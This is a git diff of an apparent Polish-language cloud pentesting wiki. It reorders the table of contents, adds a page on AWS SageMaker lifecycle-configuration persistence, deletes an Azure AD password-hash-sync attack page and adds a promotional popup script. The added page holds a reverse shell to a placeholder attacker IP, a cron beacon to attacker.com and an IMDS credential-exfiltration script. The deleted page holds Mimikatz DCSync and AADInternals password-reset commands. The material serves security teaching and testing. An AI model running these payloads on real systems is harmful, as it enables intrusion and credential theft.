diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 17225a2e2..582319269 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -442,11 +442,13 @@
   - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
   - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
     - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
-      - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
-      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
       - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
       - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
-      - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+      - [Az - Cloud Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md)
+      - [Az - Connect Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md)
+      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md)
       - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
       - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
       - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
diff --git a/src/images/discount.jpeg b/src/images/discount.jpeg
new file mode 100644
index 000000000..5c0b098d4
Binary files /dev/null and b/src/images/discount.jpeg differ
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
new file mode 100644
index 000000000..16e2b0375
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
@@ -0,0 +1,156 @@
+# AWS - SageMaker Lifecycle Configuration Persistence
+
+## Przegląd technik utrzymywania
+
+Ta sekcja opisuje metody uzyskiwania trwałości w SageMaker poprzez nadużywanie konfiguracji cyklu życia (LCC), w tym reverse shelle, zadania cron, kradzież poświadczeń za pomocą IMDS oraz backdoory SSH. Te skrypty działają z rolą IAM instancji i mogą utrzymywać się po ponownych uruchomieniach. Większość technik wymaga dostępu do sieci wychodzącej, ale korzystanie z usług w kontrolnej płaszczyźnie AWS może nadal umożliwić sukces, jeśli środowisko jest w trybie "tylko VPC".
+#### Uwaga: Instancje notebooków SageMaker to w zasadzie zarządzane instancje EC2 skonfigurowane specjalnie do obciążeń związanych z uczeniem maszynowym.
+
+## Wymagane uprawnienia
+* Instancje notebooków:
+```
+sagemaker:CreateNotebookInstanceLifecycleConfig
+sagemaker:UpdateNotebookInstanceLifecycleConfig
+sagemaker:CreateNotebookInstance
+sagemaker:UpdateNotebookInstance
+```
+* Aplikacje Studio:
+```
+sagemaker:CreateStudioLifecycleConfig
+sagemaker:UpdateStudioLifecycleConfig
+sagemaker:UpdateUserProfile
+sagemaker:UpdateSpace
+sagemaker:UpdateDomain
+```
+## Ustaw konfigurację cyklu życia na instancjach notebooków
+
+### Przykładowe polecenia AWS CLI:
+```bash
+# Create Lifecycle Configuration*
+
+aws sagemaker create-notebook-instance-lifecycle-config \
+--notebook-instance-lifecycle-config-name attacker-lcc \
+--on-start Content=$(base64 -w0 reverse_shell.sh)
+
+
+# Attach Lifecycle Configuration to Notebook Instance*
+
+aws sagemaker update-notebook-instance \
+--notebook-instance-name victim-instance \
+--lifecycle-config-name attacker-lcc
+```
+## Ustaw konfigurację cyklu życia w SageMaker Studio
+
+Konfiguracje cyklu życia mogą być przypisane na różnych poziomach i do różnych typów aplikacji w SageMaker Studio.
+
+### Poziom domeny Studio (wszyscy użytkownicy)
+```bash
+# Create Studio Lifecycle Configuration*
+
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-studio-lcc \
+--studio-lifecycle-config-app-type JupyterServer \
+--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
+
+
+# Apply LCC to entire Studio Domain*
+
+aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
+"JupyterServerAppSettings": {
+"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
+}
+}'
+```
+### Poziom Studio Space (Przestrzenie Indywidualne lub Wspólne)
+```bash
+# Update SageMaker Studio Space to attach LCC*
+
+aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
+"JupyterServerAppSettings": {
+"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
+}
+}'
+```
+## Typy konfiguracji cyklu życia aplikacji Studio
+
+Konfiguracje cyklu życia mogą być stosowane do różnych typów aplikacji SageMaker Studio:
+* JupyterServer: Uruchamia skrypty podczas uruchamiania serwera Jupyter, idealne do mechanizmów utrzymywania, takich jak reverse shells i cron jobs.
+* KernelGateway: Wykonywane podczas uruchamiania aplikacji kernel gateway, przydatne do początkowej konfiguracji lub trwałego dostępu.
+* CodeEditor: Stosuje się do Edytora Kodów (Code-OSS), umożliwiając skrypty, które uruchamiają się na początku sesji edycji kodu.
+
+### Przykładowe polecenie dla każdego typu:
+
+### JupyterServer
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-jupyter-lcc \
+--studio-lifecycle-config-app-type JupyterServer \
+--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
+```
+### KernelGateway
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-kernelgateway-lcc \
+--studio-lifecycle-config-app-type KernelGateway \
+--studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
+```
+### CodeEditor
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-codeeditor-lcc \
+--studio-lifecycle-config-app-type CodeEditor \
+--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
+```
+### Krytyczne informacje:
+* Dołączanie LCC do poziomu domeny lub przestrzeni wpływa na wszystkich użytkowników lub aplikacje w zakresie.
+* Wymaga wyższych uprawnień (sagemaker:UpdateDomain, sagemaker:UpdateSpace), co jest zazwyczaj bardziej wykonalne na poziomie przestrzeni niż domeny.
+* Kontrole na poziomie sieci (np. ścisłe filtrowanie egress) mogą zapobiec udanym reverse shellom lub exfiltracji danych.
+
+## Reverse Shell za pomocą konfiguracji cyklu życia
+
+Konfiguracje cyklu życia SageMaker (LCC) wykonują niestandardowe skrypty, gdy instancje notebooków się uruchamiają. Atakujący z odpowiednimi uprawnieniami może ustanowić trwały reverse shell.
+
+### Przykład ładunku:
+```
+#!/bin/bash
+ATTACKER_IP="<ATTACKER_IP>"
+ATTACKER_PORT="<ATTACKER_PORT>"
+nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
+```
+## Utrzymywanie się przez Cron Job za pomocą konfiguracji cyklu życia
+
+Atakujący może wstrzykiwać zadania cron za pomocą skryptów LCC, zapewniając okresowe wykonywanie złośliwych skryptów lub poleceń, co umożliwia dyskretne utrzymywanie się.
+
+### Przykład ładunku:
+```
+#!/bin/bash
+PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
+CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
+CRON_JOB="*/30 * * * * $CRON_CMD"
+
+mkdir -p /home/ec2-user/SageMaker/.local_tasks
+echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
+chmod +x $PAYLOAD_PATH
+
+(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -
+```
+## Ekstrakcja poświadczeń za pomocą IMDS (v1 i v2)
+
+Konfiguracje cyklu życia mogą zapytywać o Usługę Metadanych Instancji (IMDS), aby uzyskać poświadczenia IAM i wyekstrahować je do lokalizacji kontrolowanej przez atakującego.
+
+### Przykład ładunku:
+```bash
+#!/bin/bash
+ATTACKER_BUCKET="s3://attacker-controlled-bucket"
+TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json
+
+# Exfiltrate via S3*
+
+aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
+
+# Alternatively, exfiltrate via HTTP POST*
+
+curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
+```
+
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
deleted file mode 100644
index 2155ebb5e..000000000
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
+++ /dev/null
@@ -1,114 +0,0 @@
-# Az - PHS - Synchronizacja haszy haseł
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-## Podstawowe informacje
-
-[Z dokumentacji:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Synchronizacja haszy haseł** jest jedną z metod logowania używanych do realizacji hybrydowej tożsamości. **Azure AD Connect** synchronizuje hash, hasha, hasła użytkownika z lokalnej instancji Active Directory do opartej na chmurze instancji Azure AD.
-
-<figure><img src="../../../../images/image (173).png" alt=""><figcaption></figcaption></figure>
-
-To **najczęściej stosowana metoda** używana przez firmy do synchronizacji lokalnego AD z Azure AD.
-
-Wszystkie **użytkownicy** oraz **hash haseł** są synchronizowane z lokalnego AD do Azure AD. Jednak **hasła w postaci czystego tekstu** ani **oryginalne** **hashe** nie są wysyłane do Azure AD.\
-Ponadto, **wbudowane** grupy zabezpieczeń (jak administratorzy domeny...) **nie są synchronizowane** z Azure AD.
-
-**Synchronizacja hashy** odbywa się co **2 minuty**. Jednak domyślnie **wygasanie haseł** i **wygasanie kont** **nie są synchronizowane** w Azure AD. Tak więc użytkownik, którego **lokalne hasło wygasło** (nie zostało zmienione), może nadal **uzyskiwać dostęp do zasobów Azure** za pomocą starego hasła.
-
-Gdy lokalny użytkownik chce uzyskać dostęp do zasobu Azure, **uwierzytelnienie odbywa się w Azure AD**.
-
-**PHS** jest wymagane dla funkcji takich jak **Ochrona tożsamości** i usługi domenowe AAD.
-
-## Pivoting
-
-Gdy PHS jest skonfigurowane, niektóre **uprzywilejowane konta** są automatycznie **tworzone**:
-
-- Konto **`MSOL_<installationID>`** jest automatycznie tworzone w lokalnym AD. To konto otrzymuje rolę **Konta synchronizacji katalogu** (zobacz [dokumentację](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)), co oznacza, że ma **uprawnienia replikacji (DCSync) w lokalnym AD**.
-- Konto **`Sync_<nazwa lokalnego serwera ADConnect>_installationID`** jest tworzone w Azure AD. To konto może **resetować hasło DOWOLNEGO użytkownika** (synchronizowanego lub tylko w chmurze) w Azure AD.
-
-Hasła dwóch poprzednich uprzywilejowanych kont są **przechowywane w serwerze SQL** na serwerze, na którym **zainstalowano Azure AD Connect.** Administratorzy mogą wydobyć hasła tych uprzywilejowanych użytkowników w postaci czystego tekstu.\
-Baza danych znajduje się w `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
-
-Możliwe jest wydobycie konfiguracji z jednej z tabel, z których jedna jest zaszyfrowana:
-
-`SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;`
-
-**Zaszyfrowana konfiguracja** jest szyfrowana za pomocą **DPAPI** i zawiera **hasła użytkownika `MSOL_*`** w lokalnym AD oraz hasło **Sync\_\*** w AzureAD. Dlatego kompromitując te dane, możliwe jest uzyskanie podwyższonych uprawnień do AD i AzureAD.
-
-Możesz znaleźć [pełny przegląd tego, jak te poświadczenia są przechowywane i odszyfrowywane w tej prezentacji](https://www.youtube.com/watch?v=JEIR5oGCwdg).
-
-### Znalezienie **serwera Azure AD connect**
-
-Jeśli **serwer, na którym zainstalowano Azure AD connect** jest dołączony do domeny (zalecane w dokumentacji), można go znaleźć za pomocą:
-```bash
-# ActiveDirectory module
-Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl
-
-#Azure AD module
-Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
-```
-### Wykorzystywanie MSOL\_\*
-```bash
-# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
-Get-AADIntSyncCredentials
-
-# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
-runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
-Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
-```
-> [!OSTRZEŻENIE]
-> Możesz również użyć [**adconnectdump**](https://github.com/dirkjanm/adconnectdump), aby uzyskać te poświadczenia.
-
-### Wykorzystywanie Sync\_\*
-
-Kompromitując konto **`Sync_*`**, możliwe jest **zresetowanie hasła** dowolnego użytkownika (w tym Globalnych Administratorów)
-```bash
-# This command, run previously, will give us alse the creds of this account
-Get-AADIntSyncCredentials
-
-# Get access token for Sync_* account
-$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
-$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
-Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache
-
-# Get global admins
-Get-AADIntGlobalAdmins
-
-# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
-Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId
-
-# Reset the users password
-Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose
-
-# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)
-```
-Możliwe jest również **zmienienie haseł tylko użytkowników chmurowych** (nawet jeśli to nieoczekiwane)
-```bash
-# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
-# The CloudAnchor is of the format USER_ObjectID.
-Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID
-
-# Reset password
-Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
-```
-Możliwe jest również zrzucenie hasła tego użytkownika.
-
-> [!CAUTION]
-> Inną opcją byłoby **przyznanie uprawnień uprzywilejowanych dla principal usługi**, co użytkownik **Sync** ma **uprawnienia** do zrobienia, a następnie **uzyskanie dostępu do tego principal usługi** jako sposób na privesc.
-
-### Seamless SSO
-
-Możliwe jest użycie Seamless SSO z PHS, które jest podatne na inne nadużycia. Sprawdź to w:
-
-{{#ref}}
-seamless-sso.md
-{{#endref}}
-
-## References
-
-- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
-- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
-- [https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf)
-- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
-
-{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/theme/ai.js b/theme/ai.js
index 13337c3f1..02f51127e 100644
--- a/theme/ai.js
+++ b/theme/ai.js
@@ -1,3 +1,104 @@
+/**
+ * HackTricks Training Discounts
+ */
+
+
+(() => {
+  const KEY = 'htSummerDiscountsDismissed';
+  const IMG = '/images/discount.jpeg';
+  const TXT = 'Click here for HT Summer Discounts, Last Days!';
+  const URL = 'https://training.hacktricks.xyz';
+
+  /* Stop if user already dismissed */
+  if (localStorage.getItem(KEY) === 'true') return;
+
+  /* Quick helper */
+  const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
+
+  /* --- Overlay (blur + dim) --- */
+  const overlay = $('div', `
+    position: fixed; inset: 0;
+    background: rgba(0,0,0,.4);
+    backdrop-filter: blur(6px);
+    display: flex; justify-content: center; align-items: center;
+    z-index: 10000;
+  `);
+
+  /* --- Modal --- */
+  const modal = $('div', `
+    max-width: 90vw; width: 480px;
+    background: #fff; border-radius: 12px; overflow: hidden;
+    box-shadow: 0 8px 24px rgba(0,0,0,.35);
+    font-family: system-ui, sans-serif;
+    display: flex; flex-direction: column; align-items: stretch;
+  `);
+
+  /* --- Title bar (link + close) --- */
+  const titleBar = $('div', `
+    position: relative;
+    padding: 1rem 2.5rem 1rem 1rem; /* room for the close button */
+    text-align: center;
+    background: #222; color: #fff;
+    font-size: 1.3rem; font-weight: 700;
+  `);
+
+  const link = $('a', `
+    color: inherit;
+    text-decoration: none;
+    display: block;
+  `);
+  link.href = URL;
+  link.target = '_blank';
+  link.rel = 'noopener noreferrer';
+  link.textContent = TXT;
+  titleBar.appendChild(link);
+
+  /* Close "X" (no persistence) */
+  const closeBtn = $('button', `
+    position: absolute; top: .25rem; right: .5rem;
+    background: transparent; border: none;
+    color: #fff; font-size: 1.4rem; line-height: 1;
+    cursor: pointer; padding: 0; margin: 0;
+  `);
+  closeBtn.setAttribute('aria-label', 'Close');
+  closeBtn.textContent = '✕';
+  closeBtn.onclick = () => overlay.remove();
+  titleBar.appendChild(closeBtn);
+
+  /* --- Image --- */
+  const img = $('img');
+  img.src = IMG; img.alt = TXT; img.style.width = '100%';
+
+  /* --- Checkbox row --- */
+  const label = $('label', `
+    display: flex; align-items: center; justify-content: center; gap: .6rem;
+    padding: 1rem; font-size: 1rem; color: #222; cursor: pointer;
+  `);
+  const cb = $('input'); cb.type = 'checkbox'; cb.style.scale = '1.2';
+  cb.onchange = () => {
+    if (cb.checked) {
+      localStorage.setItem(KEY, 'true');
+      overlay.remove();
+    }
+  };
+  label.append(cb, document.createTextNode("Don't show again"));
+
+  /* --- Assemble & inject --- */
+  modal.append(titleBar, img, label);
+  overlay.appendChild(modal);
+
+  if (document.readyState === 'loading') {
+    document.addEventListener('DOMContentLoaded', () => document.body.appendChild(overlay), { once: true });
+  } else {
+    document.body.appendChild(overlay);
+  }
+})();
+
+
+
+
+
+
 /**
  * HackTricks AI Chat Widget v1.16 – resizable sidebar
  * ---------------------------------------------------